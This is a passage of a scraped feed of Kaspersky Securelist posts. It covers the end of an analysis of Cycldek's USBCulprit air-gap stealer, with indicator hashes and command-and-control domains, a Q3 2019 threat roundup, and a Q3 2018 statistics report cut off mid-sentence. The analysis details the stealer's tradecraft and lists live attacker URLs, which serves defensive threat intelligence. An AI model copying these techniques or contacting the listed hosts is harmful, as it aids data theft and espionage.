behind it makes use of similar TTPs seen in the previously described implants attributed to Cycldek. For example, binaries mimicking AV components are leveraged for conducting DLL load-order hijacking. In this case, one of the files dropped from the cabinet archive named 'wrapper.exe' (originally named 'PtUserSessionWrapper.exe' and belonging to Trend Micro) forces the execution of a malicious DLL named 'TmDbgLog.dll'. Also, the malware makes use of an encrypted blob that is decrypted using RC4 and executed using a custom PE loader. The full chain is depicted in the figure below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123540/cycldek_bridging_10.png>)\n\n**__Figure 9_: USBCulprit's loading flow, as observed in samples after 2017._**\n\nOnce USBCulprit is loaded to memory and executed, it operates in three phases:\n\n * **Boostrap and data collection:** this stage prepares the environment for the malware's execution. Namely, it invokes two functions named 'CUSB::RegHideFileExt' and 'CUSB::RegHideFile' that modify registry keys to hide the extensions of files in Windows and verify that hidden files are not shown to the user. It also writes several files to disk and initializes a data structure with paths that are later used or searched by the malware.Additionally, the malware makes a single scan to collect files it intends to steal using a function named 'CUSB::USBFindFile'. They are sought by enumerating several predefined directories to locate documents with either one of the following extensions: *.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf. Every document found is logged in a file that enlists all targeted paths for theft within a directory, such that every checked directory has a corresponding list file.\n\nThe chosen files are then grouped into encrypted RAR archives. To achieve that, the malware extracts a 'rar.exe' command line utility, hardcoded as a cabinet archive in its binary, and runs it against every list created in the former step. The password for the archive is initialized at the beginning of the malware's execution, and is set to 'abcd!@#$' for most variants that we observed.\n\nIt is worth noting that sought documents can be filtered by their modification date. Several variants of USBCulprit perform a check for a file named 'time' within the directory from which the malware is executed. This file is expected to have a date-time value that specifies the modification timestamp beyond which files are considered of interest and should be collected. If the 'time' file doesn't exist, it is created with the default value '20160601000000' corresponding to 01/06/2016 00:00:00.\n\n * **USB connection interception and data exfiltration/delivery**: when bootstrapping and data collection is completed, the malware attempts to intercept the connection of new media and verify that it corresponds to a removable drive. This is achieved by running an infinite loop, whereby the malware is put to sleep and wakes at constant intervals to check all connected drives with the GetDriveTypeW function. If at least one is of type DRIVE_REMOVABLE, further actions are taken.\n\nWhen a USB is connected, the malware will verify if stolen data should be exfiltrated to it or it already contains existing data that should be copied locally. To do this, a directory named '$Recyc1e.Bin' will be searched in the drive and if not found, will be created. This directory will be used as the target path for copying files to the drive or source path for obtaining them from it.\n\nTo understand which direction of file copy should take place, a special marker file named '1.txt' is searched locally. If it exists, the malware would expect to find the aforementioned '$Recyc1e.Bin' directory in the drive with previously stolen document archives and attempt to copy it to the disk. Otherwise, the local archive files will be copied to the same directory from the disk to the drive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123634/cycldek_bridging_11.png>)\n\n**__Figure 10_: USBCulprit's check for the 1.txt marker, indicating if stolen files should be copied to the removable drive, or from it._**\n\n * **Lateral movement and extension**: as part of the same loop mentioned above, the existence of another marker file named '2.txt' will be checked locally to decide if lateral movement should be conducted or not. Only if this file exists, will the malware's binary be copied from its local path to the '$Recyc1e.Bin' directory. It's noteworthy that we were unable to spot any mechanism that could trigger the execution of the malware upon USB connection, which leads us to believe the malware is supposed to be run manually by a human handler.Apart from the above, USBCulprit is capable of updating itself or extending its execution with further modules. This is done by looking for the existence of predefined files in the USB and executing them. Examples for these include {D14030E9-C60C-481E-B7C2-0D76810C6E96} and {D14030E9-C60C-481E-B7C2-0D76810C6E95}.Unfortunately, we could not obtain those files during analysis and cannot tell what their exact purpose is. We can only guess that they are used as extension modules or updated versions of the malware itself based on their behavior. The former is an archive that is extracted to a specific directory that has its files enumerated and executed using an internal function named 'CUSB::runlist', while the latter is a binary that is copied to the %TEMP% directory and spawned as a new process.\n\nThe characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines. This would explain the lack of any network communication in the malware, and the use of only removable media as a means of transferring inbound and outbound data. Also, we witnessed some variants issue commands to gather various pieces of host network information. These are logged to a file that is later transferred along with the stolen data to the USB and can help attackers profile whether the machine in which the malware was executed is indeed part of a segregated network.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123723/cycldek_bridging_12.png>)\n\n**__Figure 11_: Commands used to profile the network connectivity of the compromised host._**\n\nAnother explanation is that the malware was handled manually by operators on the ground. As mentioned earlier, there is no evident mechanism for automatically executing USBCulprit from infected media, and yet we saw that the same sample was executed from various drive locations, suggesting it was indeed spread around. This, along with the very specific files that the malware seeks as executable extensions and could not be found as artifacts elsewhere in our investigation, point to a human factor being required to assist deployment of the malware in victim networks.\n\n## Conclusion\n\nCycldek is an example of an actor that has broader capability than publicly perceived. While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\n\nFurthermore, our analysis of the implants affiliated to the group give an insight into its organizational structure. As already stated, the similarities and differences in various traits of these pieces of malware indicate that they likely originated from different arms of a single organization. Perhaps it's worth noting that we noted multiple points where such entities didn't work in a well-coordinated manner, for example, infecting machines using the BlueCore implant when they were already infected with RedCore.\n\nLastly, we believe that such attacks will continue in Southeast Asian countries. The use of different tools to reach air-gapped networks in the same countries and attempts to steal data from them have been witnessed in the past. Our analysis shows this type of activity has not ceased \u2013 it has merely evolved and changed shape, in terms of malware and actors. We continue to track the actor and report on its activity in our Threat Intelligence Portal.\n\nFor more information about Cycldek operations, contact us at: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n### Appendix - IOCs\n\n_Note_: a full list of IOCs can be found in our reports on the subject in Kaspersky's Threat Intelligence Portal.\n\n**RedCore**:\n\nA6C751D945CFE84C918E88DF04D85798 - wsc.dll (side-loaded DLL) \n4B785345161D288D1652C1B2D5CEADA1 - msgsm64.acm (encrypted shellcode and implant)\n\n**BlueCore**:\n\n1B19175C41B9A9881B23B4382CC5935F - QcLite.dll (side-loaded DLL) \n6D2E6A61EEDE06FA9D633CE151208831 - QcLite.dll (side-loaded DLL) \n6EA33305B5F0F703F569B9EBD6035BFD - QcLite.dll (side-loaded DLL) \n600E14E4B0035C6F0C6A344D87B6C27F- stdole.tlb (encrypted Shellcode and Implant)\n\n**Lateral Movement and Info-Stealing Toolset:**\n\n1640EE7A414DFF996AF8265E0947DE36 Chromepass \n1EA07468EBDFD3D9EEC59AC57A490701 Chromepass \n07EE1B99660C8CD5207E128F44AA8CBC JsonCookies \n809196A64CA4A32860D28760267A1A8B Custom HDoor \n81660985276CF9B6D979753B6E581D34 Custom HDoor \nA44804C2767DCCD4902AAE30C36E62C0 Custom HDoor\n\n \n\n**USBCulprit: **\n\nA9BCF983FE868A275F8D9D8F5DEFACF5 USBCulprit Loader \nC73B000313DCD2289F51B367F744DCD8 USBCulprit Loader \n2FB731903BD12FF61E6F778FDF9926EE USBCulprit Loader \n4A21F9B508DB19398AEE7FE4AE0AC380 USBCulprit Loader \n6BE1362D722BA4224979DE91A2CD6242 USBCulprit Loader \n7789055B0836A905D9AA68B1D4A50F09 USBCulprit Loader \n782FF651F34C87448E4503B5444B6164 USBCulprit Loader \n88CDD3CE6E5BAA49DC69DA664EDEE5C1 USBCulprit Loader \nA4AD564F8FE80E2EE52E643E449C487D USBCulprit Loader \n3CA7BD71B30007FC30717290BB437152 USBCulprit Payload \n58FE8DB0F7AE505346F6E4687D0AE233 USBCulprit Payload \nA02E2796E0BE9D84EE0D4B205673EC20 USBCulprit Payload \nD8DB9D6585D558BA2D28C33C6FC61874 USBCulprit Payload \n2E522CE8104C0693288C997604AE0096 USBCulrprit Payload\n\n \n\n**Toolset overlapping in both clusters:**\n\n**Common Name ** | **MD5** | **Blue Cluster Domain** | **Red Cluster Domain** | **Description** \n---|---|---|---|--- \nchromepass.exe | 1EA07468EBDFD3D9EEC59AC57A490701 | http://login.vietnamfar.com:8080\n\n | http://news.trungtamwtoa.com:88 | ChromePass \ngoopdate.dll | D8DB9D6585D558BA2D28C33C6FC61874 | http://cophieu.dcsvnqvmn.com:8080 | http://mychau.dongnain.com:443\n\nhttp://hcm.vietbaonam.com:443 | USBCulprit \n2E522CE8104C0693288C997604AE0096 | http://nghiencuu.onetotechnologys.com:8080\n\nttp://tinmoi.thoitietdulich.com:443\n\nhttp://tinmoi.thoitietdulich.com:53 | http://tinmoi.vieclamthemde.com:53\n\nhttp://tinmoi.vieclamthemde.com | USBCulprit \nqclite.dll | 7FF0AF890B00DEACBF42B025DDEE8402 | http://web.hcmuafgh.com | http://tinmoi.vieclamthemde.com\n\nhttp://tintuc.daikynguyen21.com | BlueCore Loading Hijacked DLL \nsilverlightmsi.dat | A44804C2767DCCD4902AAE30C36E62C0 | http://web.laovoanew.com:443\n\nhttp://cdn.laokpl.com:8080 | http://login.dangquanwatch.com:53\n\nhttp://info.coreders.com:8080 | Custom HDoor \n \n \n\n**C&amp;Cs and Dropzones**:\n\nhttp://web.laovoanew[.]com - Red Cluster\n\nhttp://tinmoi.vieclamthemde[.]com - Red Cluster\n\nhttp://kinhte.chototem[.]com - Red Cluster\n\nhttp://news.trungtamwtoa[.]com - Red Cluster\n\nhttp://mychau.dongnain[.]com - Red Cluster\n\nhttp://hcm.vietbaonam[.]com - Red Cluster\n\nhttp://login.thanhnienthegioi[.]com - Red Cluster\n\nhttp://103.253.25.73 - Red Cluster\n\nhttp://luan.conglyan[.]com - Red Cluster\n\nhttp://toiyeuvn.dongaruou[.]com - Red Cluster\n\nhttp://tintuc.daikynguyen21[.]com - Red Cluster\n\nhttp://web.laomoodwin[.]com - Red Cluster\n\nhttp://login.giaoxuchuson[.]com - Red Cluster\n\nhttp://lat.conglyan[.]com - Red Cluster\n\nhttp://thegioi.kinhtevanhoa[.]com - Red Cluster\n\nhttp://laovoanew[.]com - Red Cluster\n\nhttp://cdn.laokpl[.]com - Red Cluster\n\nhttp://login.dangquanwatch[.]com - Blue Cluster\n\nhttp://info.coreders[.]com - Blue Cluster\n\nhttp://thanhnien.vietnannnet[.]com - Blue Cluster\n\nhttp://login.diendanlichsu[.]com - Blue Cluster\n\nhttp://login.vietnamfar[.]com - Blue Cluster\n\nhttp://cophieu.dcsvnqvmn[.]com - Blue Cluster\n\nhttp://nghiencuu.onetotechnologys[.]com - Blue Cluster\n\nhttp://tinmoi.thoitietdulich[.]com - Blue Cluster\n\nhttp://khinhte.chinhsech[.]com - Blue Cluster\n\nhttp://images.webprogobest[.]com - Blue Cluster\n\nhttp://web.hcmuafgh[.]com - Blue Cluster\n\nhttp://news.cooodkord[.]com - Blue Cluster\n\nhttp://24h.tinthethaoi[.]com - Blue Cluster\n\nhttp://quocphong.ministop14[.]com - Blue Cluster\n\nhttp://nhantai.xmeyeugh[.]com - Blue Cluster\n\nhttp://thoitiet.yrindovn[.]com - Blue Cluster\n\nhttp://hanghoa.trenduang[.]com - Blue Cluster", "cvss3": {}, "published": "2020-06-03T10:00:32", "type": "securelist", "title": "Cycldek: Bridging the (air) gap", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0802"], "modified": "2020-06-03T10:00:32", "id": "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "href": "https://securelist.com/cycldek-bridging-the-air-gap/97157/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-29T10:36:40", "description": "\n\n## Targeted attacks and malware campaigns\n\n### Mobile espionage targeting the Middle East\n\nAt the end of June we reported the details of a highly targeted campaign that we dubbed 'Operation ViceLeaker' involving the spread of malicious Android samples via instant messaging. The campaign affected several dozen victims in Israel and Iran. We discovered this activity in May 2018, right after Israeli security agencies announced that Hamas had installed spyware on the smartphones of Israeli soldiers, and we released a private report on our [Threat Intelligence Portal](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>). We believe the malware has been in development since late 2016, but the main distribution began at the end of 2017. The attackers used two methods to install these implants: they backdoored legitimate apps, injecting malicious Smali code; and they built an open-source legitimate 'Conversations' messenger that included the malicious code. You can read more about Operation ViceLeaker [here](<https://securelist.com/fanning-the-flames-viceleaker-operation/90877/>).\n\n### APT33 beefs up its toolset\n\nIn July, we published an update on the 2016-17 activities of [NewsBeef](<https://securelist.com/twas-the-night-before/91599/>) (aka APT33 and Charming Kitten), a threat actor that has focused on targets in Saudi Arabia and the West. NewsBeef lacks advanced offensive capabilities and has previously engaged in long-term, elaborate social engineering schemes that take advantage of popular social network platforms. In previous campaigns, this threat actor has relied heavily on the Browser Exploitation Framework (BeEF). However, in the summer of 2016, the group deployed a new toolset that included macro-enabled Office documents, PowerSploit, and the Pupy backdoor. The most recent campaign uses this toolset in conjunction with [spear-phishing](<https://encyclopedia.kaspersky.com/glossary/spear-phishing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) emails, links sent over social media and standalone private messaging applications, and [watering-hole](<https://encyclopedia.kaspersky.com/glossary/watering-hole/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) attacks that use compromised high-profile websites (some belonging to the Saudi government). The group has changed multiple characteristics year over year \u2013 tactics, the malicious JavaScript injection strategically placed on compromised websites, and command-and-control (C2) infrastructure. Subscribers to our [private intelligence reports](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>) receive unique and extraordinary data on significant activity and campaigns of more than 1009 APTs from across the world, including NewsBeef.\n\n### New FinSpy iOS and Android implants found in the wild\n\nWe recently reported on the [latest versions of FinSpy for Android and iOS](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>). Governments and law enforcement agencies across the world use this surveillance software to collect personal data. FinSpy implants for iOS and Android have almost identical functionality: they are able to collect personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges by abusing known vulnerabilities. The iOS version doesn't provide infection exploits for its customers and so can only be installed on [jailbroken](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) devices \u2013 suggesting that physical access is required in order to install the implant. During our latest research we detected up-to-date versions of these implants in almost 20 countries, but we think the actual number of infections could be much higher.\n\n### Turla revamps its toolset\n\nTurla (aka Venomous Bear, Uroboros and Waterbug), a high profile Russian-speaking threat actor with a known interest in cyber-espionage against government and diplomatic targets, has made significant changes to its toolset. Most notably, the group has wrapped its notorious JavaScript KopiLuwak malware in a new dropper called Topinambour, a new.NET file that is being used by Turla to distribute and drop its JavaScript KopiLuwak through infected installation packages for legitimate software programs such as VPNs for circumventing internet censorship. Named by the malware authors, Topinambour is an alternative name for the Jerusalem artichoke. Some of the changes the threat actor has made are intended to help it evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. Further, the malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. The two KopiLuwak analogues \u2013 the.NET RocketMan Trojan and the PowerShell MiamiBeach Trojan \u2013 are used for cyber-espionage. We think the threat actor deploys these versions when the computers of the targets are protected with security software capable of detecting KopiLuwak. All three implants are able to fingerprint targets, gather information on system and network adapters, steal files, and download and execute additional malware. MiamiBeach is also able to take screenshots. You can read more [here](<https://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/>).\n\n### CloudAtlas uses new infection chain\n\n[Cloud Atlas](<https://securelist.com/recent-cloud-atlas-activity/92016/>) (aka Inception) has a long history of cyber-espionage operations targeting industries and government bodies. We first reported this group in 2014 and we have continued to track its activities. During the first half of this year, we identified campaigns focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts. Cloud Atlas hasn't changed its TTPs (Tactics, Techniques and Procedures) since 2018 and continues to rely on existing tactics and malware to compromise high value targets. The threat actor's Windows intrusion set still uses spear-phishing emails to target its victims: these are crafted with Office documents that use malicious remote templates \u2013 whitelisted per victim \u2013 hosted on remote servers. Previously, Cloud Atlas dropped its 'validator' implant, named PowerShower, directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. In recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed in 2014.\n\n### Dtrack banking malware discovered\n\nIn summer 2018, we discovered ATMDtrack, a piece of banking malware targeting banks in India. We used YARA and the Kaspersky Attribution Engine to try to uncover more information about this ATM malware; and we found more than 180 new malware samples of a spy tool that we now call Dtrack. All the Dtrack samples we initially found were dropped samples, as the real payload was encrypted with various droppers \u2013 we were able to find them because of the unique sequences shared by ATMDtrack and the Dtrack [memory dumps](<https://encyclopedia.kaspersky.com/glossary/dump/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Once we decrypted the final payload and used the Kaspersky Attribution Engine again, we saw similarities with the [DarkSeoul campaign](<https://unit42.paloaltonetworks.com/tdrop2-attacks-suggest-dark-seoul-attackers-return/>), dating back to 2013 and attributed to the Lazarus group. It seems that they reused part of their old code to attack the financial sector and research centers in India. Our telemetry indicates that the latest DTrack activity was detected in the beginning of September 2019. This is a good example of how proper YARA rules and a solid working attribution engine can help to uncover connections with established malware families. In this case, we were able to add another family to the Lazarus group's arsenal: ATMDtrack and Dtrack. You can find our public report on Dtrack [here](<https://securelist.com/my-name-is-dtrack/93338/>).\n\n## Other security news\n\n### Sodin ransomware attacks MSP\n\nIn April, the Sodin ransomware (aka Sodinokibi and REvil) caught our attention, not least, because of the way it spread. The Trojan [exploited the CVE-2019-2725 vulnerability](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) to execute a PowerShell command on a vulnerable Oracle WebLogic server, allowing the attackers to upload a dropper to the server, which then installed the ransomware payload. Patches for this vulnerability were released in April, but at the end of June, a similar vulnerability was discovered \u2013 CVE-2019-2729. Sodin also carried out [attacks on MSPs](<https://www.darkreading.com/attacks-breaches/attackers-exploit-msps-tools-to-distribute-ransomware/d/d-id/1335025>). In some cases, the attackers used the Webroot and Kaseya remote access consoles to deliver the Trojan. In others, [the attackers penetrated MSP infrastructure using an RDP connection](<https://www.reddit.com/r/msp/comments/c2wls0/kaseya_weaponized_to_deliver_sodinokibi_ransomware/>), elevated privileges, deactivated security solutions and backups and then downloaded the ransomware to client computers. This ransomware was also unusual because it didn't require the victim to carry out any action. Our statistics indicated that most victims were located in the Asia-Pacific region, including Taiwan, Hong Kong and South Korea.\n\nRansomware continues to be a major headache for consumers and businesses alike. Recovering data that a ransomware Trojan has encrypted is often impossible. However, in some cases we are able to do so. Recent examples include the [Yatron and FortuneCrypt malware](<https://securelist.com/ransomware-two-pieces-of-good-news/93355/>). If you ever face a situation where a ransomware Trojan has encrypted your data, and you don't have a backup, it's always worth checking the [No More Ransom](<https://www.nomoreransom.org/>) site, to see if a decryptor is available. You can find our decryptors for both of the above ransomware programs [here](<https://support.kaspersky.com/viruses/disinfection/10556>) and [here](<https://www.nomoreransom.org/en/decryption-tools.html>).\n\n### The impact of web mining\n\n[Malicious miners](<https://securelist.com/kaspersky-security-bulletin-2018-story-of-the-year-miners/89096/>) are programs designed to hijack the victim's CPU in order to mine crypto-currencies. The business model is simple: infect the computer, use the processing power of their [CPU](<https://en.wikipedia.org/wiki/Central_processing_unit>) or [GPU](<https://en.wikipedia.org/wiki/Graphics_processing_unit>) to generate coins and earn real-world money through legal exchanges and transactions. It's not obvious to the victim that they are infected \u2013 most people seldom use most of their computer's processing power and miners harness the 70-80% that is not being used for anything else. Miners can be installed along with adware, hacked games and other pirated content. However, there's also another model \u2013 using an embedded mining script that starts when the victim opens an infected web page. Where a corporate network has been infected, the CPU capacity available to the cybercriminals can be huge. But what impact does mining have? We recently tried to quantify the economic and environmental impact of web miners; and thereby evaluate the positive benefit of protecting against mining.\n\nThe total power saving can be calculated using the formula \u00b7N, where is the average value of the increase in power consumption of the victim's device during the web mining process, and N is the number of blocked attempts according to KSN ([Kaspersky Security Network](<https://www.kaspersky.com/ksn>)) data for 2018. This figure is equal to 18.8\u00b111.8 gigawatts (GW) \u2013 twice the average power consumption rate of all Bitcoin miners in the same year. To assess the amount of saved energy based on this power consumption rate, this number is multiplied by the average time that victim devices spend on web mining; that is, according to the formula '\u00b7N\u00b7t', where 't' is the average time that web miners would have been working had they not been blocked by our products. Since this value cannot be obtained from Kaspersky data, we used information from open sources provided by third-party researchers, according to which the estimated amount of electricity saved by users of our products ranges from 240 to 1,670 megawatt hours (MWh). Using the average prices for individual consumers, this amount of electricity could cost up to $200,000 for residents in North America or up to \u20ac250,000 for residents in Europe.\n\nYou can read our report [here](<https://securelist.com/electricity-and-mining/93292/>).\n\n### Mac OS threat landscape\n\nSome people still believe that there are no serious threats for Mac OS. There are certainly fewer threats than for Windows, mainly because more people run Windows, so there is a bigger pool of potential victims for attackers to target. However, as the number of people running Mac OS has grown, so have the number of threats targeting them.\n\nOur database currently contains 206,759 unique malicious and potentially unwanted files for Mac OS. From 2012 to 2017, the number of people facing attack grew year by year, reaching a peak in 2017, when we blocked attacks on around 255,000 computers running Mac OS. Since then, there has been a drop; and in the first half of 2019, we blocked around 87,000 attacks. The majority of threats for Mac OS in 2019 fell into the adware category \u2013 these threats are easier to create, offering a better return on investment for cybercriminals.\n\nThe number of phishing attacks targeting Mac OS has also increased year by year. During the first half of 2019, we detected nearly 6 million phishing attacks, 11.8% of which targeted corporate users. The countries facing the most phishing attacks were Brazil (30.87%), India (22.08%) and France (22.02%). The number of phishing attacks seeking to exploit the Apple brand name has also grown in recent years \u2013 by around 30-40% each year. In 2018, there were nearly 1.5 million such attacks; and in the first half of 2019 alone, the number exceeded 1.6 million \u2013 already an increase of 9% over the previous year.\n\nYou can read our report on the current Mac OS threat landscape [here](<https://securelist.com/threats-to-macos-users/93116/>).\n\n### Smart home vulnerabilities\n\nOne of our colleagues chose to turn his home into a smart home and installed a Fibaro Home Center system, so that he could remotely manage smart devices in the house, including lights, heating system, fridge, stereo system, sauna heater, smoke detectors, flood sensors, IP cameras and doorbell. He invited researchers from the [Kaspersky ICS CERT](<https://ics-cert.kaspersky.com/>) team to investigate it to see how secure it was. The researchers knew the model of the smart home hub and the IP address. They decided not to look at the Z-Wave protocol, which the smart home hub uses to talk to the appliances, because this required physical proximity to the house. They also discarded the idea of exploiting the programming language interpreter \u2013 the Fibaro hub used the patched version.\n\nOur researchers were able to find a remote SQL injection vulnerability, despite the efforts of Fibaro to avoid them, and a couple of remote code execution vulnerabilities in the PHP code. If exploited, these vulnerabilities would allow attackers to get root access rights on the smart hub, giving them full control over it. They also found a severe vulnerability in the Fibaro cloud that could allow an attacker to access all backups uploaded from Fibaro hubs around the world. This is how our research team acquired the backup data stored by the Fibaro Home Center located in this particular home. Among other things, this backup contains a database file with a lot of personal information, including the house's location, geo-location data from the owner's smartphone, the email address used to register with Fibaro, information about smart devices in the owner's home and even the owner's password. Credit to Fibaro Group not only for creating a rather secure product but also for working closely with our researchers to quickly patch the vulnerabilities we reported to them. You can read the full story [here](<https://securelist.com/fibaro-smart-home/91416/>).\n\n### Security of smart buildings\n\nThis quarter we also looked at the [security of automation systems in buildings](<https://securelist.com/smart-buildings-threats/93322/>) \u2013 sensors and controllers to manage elevators, ventilation, heating, lighting, electricity, water supply, video surveillance, alarm systems, fire extinguishing systems and more in industrial facilities. Such systems are used not only in office and residential buildings but also in hospitals, shopping malls, prisons, industrial production, public transport and other places where large work and/or living areas need to be controlled. We looked at the live threats to building-based automation systems to see what malware their owners encountered in the first six months of 2019.\n\nMost of the blocked threats were neither targeted, nor specific to building-based automation systems, but ordinary malware regularly found on corporate networks unrelated to automation systems. Such threats can still have a significant impact on the availability and integrity of automation systems, from file encryption (including databases) to denial of service on network equipment and workstations because of malicious traffic and unstable exploits. Spyware and backdoors pose a far greater threat, since stolen authentication data and the remote control it provides can be used to plan and carry out a subsequent targeted attack on a building's automation system.\n\n### Smart cars and connected devices\n\nKaspersky has investigated smart car security several times in recent years ([here](<https://securelist.com/mobile-apps-and-stealing-a-connected-car/77576/>) and [here](<https://securelist.com/a-study-of-car-sharing-apps/86948/>)), revealing a number of security issues. As vehicles become smarter and more connected they are also becoming more exposed. However, this doesn't just apply to smart cars and the apps that support them. There is now a whole industry of after-market devices designed to improve the driving experience \u2013 from car scanners to tuning gadgets. In a recent report, [we reviewed a number of automotive connected devices](<https://securelist.com/on-the-iot-road/91833/>) and reviewed their security setup. This exercise provided us with a first look at security issues in these devices. Our review included a couple of auto scanners, a dashboard camera, a GPS tracker, a smart alarm system and a pressure and temperature monitoring system.\n\nWe found the security of these devices more or less adequate, leaving aside minor issues. This is partly due to the limited device functionality and a lack of serious consequences in the event of a successful attack. It's also due to the vigilance of vendors. However, as we move towards a more and more connected future, it's important to remember that the smarter an object is the more attention should be paid to security in the development and updating of a device: careless development or an unpatched vulnerability could allow an attacker to hijack a victim's car or spy on an entire car fleet.\n\nWe continue to develop [KasperskyOS](<https://os.kaspersky.com/2019/05/20/kasperskyos-an-immune-based-approach-to-information-system-security/>), to help customers secure connected systems \u2013 including mobile devices and PCs, internet of things devices, intelligent energy systems, industrial systems, telecommunications systems and transportation systems.\n\nIf you're considering buying a device to make your car a little bit smarter, you should think about the security risks. Check to see if any vulnerabilities affect the device and whether it's possible to apply security updates to it. Don't automatically buy the most recently released product, since it might contain a security flaw that hasn't yet been discovered: the best choice is to buy a product that has already been updated several times. Finally, always consider the security of the 'mobile dimension' of the device, especially if you use an Android device: while applications make life easier, once a smartphone is hit by malware a lot can go wrong.\n\n### Personal data theft\n\nWe've become used to a steady stream of reports in the news about data breaches. Recent examples include the [theft of 23,205,290 email addresses](<https://www.forbes.com/sites/daveywinder/2019/08/05/cafepress-hacked-23m-accounts-compromised-is-yours-one-of-them/#625d70cf407e>) together with passwords weakly stored as base64 SHA-1 encoded hashes from CafePress. Worryingly, the hack was reported by [Have I Been Pwned](<https://haveibeenpwned.com>) \u2013 CafePress didn't notify its customers until some months after the breach had occurred.\n\nIn August, two Israeli [researchers discovered fingerprints, facial recognition data and other personal information from the Suprema Biostar 2 biometric access control system in a publicly accessible database](<https://www.theguardian.com/technology/2019/aug/14/major-breach-found-in-biometrics-system-used-by-banks-uk-police-and-defence-firms>). The exposure of biometric data is of particular concern. If a hacker is able to obtain my password, I can change it, but a biometric is for life.\n\n[Facebook has faced criticism on several occasions for failing to handle customers' data properly](<https://www.kaspersky.com/blog/facebook-10-fails/26980/>). In the latest of a long list of incidents, hundreds of millions of [phone numbers linked to Facebook accounts were found online](<https://techcrunch.com/2019/09/04/facebook-phone-numbers-exposed/?guccounter=1>) on a server that wasn't protected with a password. Each record contained a unique Facebook ID and the phone number listed on the account, leaving affected Facebook customers open to spam calls and SIM-swap attacks.\n\nOn September 12, mobile gaming company [Zynga reported that some player account data may have been accessed illegally by 'outside hackers'](<https://www.scmagazine.com/home/security-news/the-word-is-out-zynga-was-breached/>). Subsequently, a hacker going by the name of Gnosticplayers claimed to have breached the player database of _Words With Friends_, as well as data from _Draw Something_ and the discontinued game _OMGPOP_, exposing the data of more than 200 million Android and iOS players. While Zynga spotted the breach and notified customers, it's worrying that passwords were stored in cleartext.\n\nConsumers have no direct control over the security of the personal data they disclose to online providers. However, we can limit the damage of a security breach at an online provider by ensuring that they create passwords that are unique and hard to guess, or use a password manager to do this for us. By making use of two-factor authentication, where offered by an online provider, we can further reduce the impact of any breach.\n\nIt's also worth bearing in mind that hacking the server of an online provider isn't the only way that cybercriminals can get their hands on passwords and other personal data. They also harvest data stored on a consumer's computer directly. This includes data stored in browsers, files from the hard disk, system data, account logins and more. Our data shows that 940,000 people were targeted by malware designed to steal such data in the first half of 2019. We would recommend using specialist software to store account passwords and bank card details, rather than relying on your browser. You can find out more about how cybercriminals target personal data on computers [here](<https://securelist.com/how-to-steal-a-million-of-your-data/91855/>).", "cvss3": {}, "published": "2019-11-29T10:00:12", "type": "securelist", "title": "IT threat evolution Q3 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802", "CVE-2019-2725", "CVE-2019-2729"], "modified": "2019-11-29T10:00:12", "id": "SECURELIST:967D8B65D5D554FFB5B46411F654A78A", "href": "https://securelist.com/it-threat-evolution-q3-2019/95268/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-11-30T17:13:50", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. _\n\n## Q3 figures\n\nAccording to Kaspersky Security Network:\n\n * Kaspersky Lab solutions blocked 947,027,517 attacks launched from online resources located in 203 countries.\n * 246,695,333 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 305,315 users.\n * Ransomware attacks were registered on the computers of 259,867 unique users.\n * Our File Anti-Virus logged 239,177,356 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 1,305,015 malicious installation packages\n * 55,101 installation packages for mobile banking Trojans\n * 13,075 installation packages for mobile ransomware Trojans.\n\n## Mobile threats\n\n### Q3 events\n\nPerhaps the biggest news of the reporting period was the [Trojan-Banker.AndroidOS.Asacub](<https://securelist.com/the-rise-of-mobile-banker-asacub/87591/>) epidemic. It peaked in September when more than 250,000 unique users were attacked \u2013 and that only includes statistics for those with Kaspersky Lab's mobile products installed on their devices.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09145748/it-threat-evolution-q3-2018-statistics_01.png>)\n\n_Number of users attacked by the mobile banker Asacub in 2017 and 2018_\n\nThe scale of the attack involving Asacub by far surpasses the largest attacks we have previously observed while monitoring mobile threats. The Trojan's versions have sequential version numbers, suggesting the attacks were launched by just one threat actor. It's impossible to count the total number of 